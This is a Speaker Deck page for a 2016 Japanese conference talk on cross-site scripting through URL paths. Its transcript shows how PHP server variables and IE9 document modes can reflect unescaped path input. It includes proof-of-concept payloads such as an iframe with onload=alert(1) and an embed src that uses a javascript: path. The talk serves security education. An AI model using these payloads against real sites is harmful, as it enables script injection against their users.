Lock in $30 Savings on PRO—Offer Ends Soon! ⏳
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Search
Masato Kinugawa
March 29, 2016
Technology
14
28k
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Shibuya.XSS techtalk #7 の資料です。
Masato Kinugawa
March 29, 2016
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
Shadow DOMとセキュリティ - 光と影の境界を探る / Shibuya.XSS techtalk #13
masatokinugawa
0
610
Shadow DOM & Security - Exploring the boundary between light and shadow
masatokinugawa
1
1.8k
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
masatokinugawa
1
970
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
masatokinugawa
8
4.1k
バグハンティングのすゝめ / P3NFEST
masatokinugawa
5
2.5k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
20k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
1
23k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
20
7.1k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
100k
Other Decks in Technology
See All in Technology
Bakuraku Engineering Team Deck
layerx
PRO
6
1.1k
Introduction to Sansan, inc / Sansan Global Development Center, Inc.
sansan33
PRO
0
2.9k
Claude Code はじめてガイド -1時間で学べるAI駆動開発の基本と実践-
oikon48
37
18k
LangChain v1.0にトライ~ AIエージェントアプリの移行(v0.3 → v1.0) ~
happysamurai294
0
140
re:Invent2025とAWS Builder Cards Resilience Expansionのご紹介
tsuwa61
1
130
Active Directory 勉強会 第 6 回目 Active Directory セキュリティについて学ぶ回
eurekaberry
16
5.4k
Modern Data Stack大好きマンが語るSnowflakeの魅力
sagara
0
220
[続・営業向け 誰でも話せるOCI セールストーク] AWSよりOCIの優位性が分からない編(2025年11月21日開催)
oracle4engineer
PRO
1
200
MCP・A2A概要 〜Google Cloudで構築するなら〜
shukob
0
110
「え?!それ今ではHTMLだけでできるの!?」驚きの進化を遂げたモダンHTML
riyaamemiya
2
1.1k
Pandocでmd→pptx便利すぎワロタwww
meow_noisy
2
1.1k
AI エージェント活用のベストプラクティスと今後の課題
asei
2
430
Featured
See All Featured
Art, The Web, and Tiny UX
lynnandtonic
303
21k
Building Flexible Design Systems
yeseniaperezcruz
329
39k
How Fast Is Fast Enough? [PerfNow 2025]
tammyeverts
3
360
Intergalactic Javascript Robots from Outer Space
tanoku
273
27k
We Have a Design System, Now What?
morganepeng
54
7.9k
Fashionably flexible responsive web design (full day workshop)
malarkey
407
66k
GitHub's CSS Performance
jonrohan
1032
470k
Rails Girls Zürich Keynote
gr2m
95
14k
Balancing Empowerment & Direction
lara
5
770
Leading Effective Engineering Teams in the AI Era
addyosmani
8
1.2k
A better future with KSS
kneath
240
18k
Principles of Awesome APIs and How to Build Them.
keavy
127
17k
Transcript
None
None
None
None
None
https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...
... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1
... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1
None
http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz
http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc
None
SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>
GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php
/test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E
http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
/test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1
/test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>
None
None
None
None
None
None
None
None
None
None
None
None
None
None
None
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta
http-equiv="X-UA-Compatible" content="IE=9"> </head>
<svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>
ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError
<meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe
src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf
<meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>
<script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>
None
None
None
None
None
None
None
None
None
None
None
None
None
masatokinugawa
layerx
sansan33
oikon48
happysamurai294
tsuwa61
eurekaberry
sagara
oracle4engineer
shukob
riyaamemiya
meow_noisy
asei
lynnandtonic
yeseniaperezcruz
tammyeverts
tanoku
morganepeng
malarkey
jonrohan
gr2m
lara
addyosmani
kneath
keavy
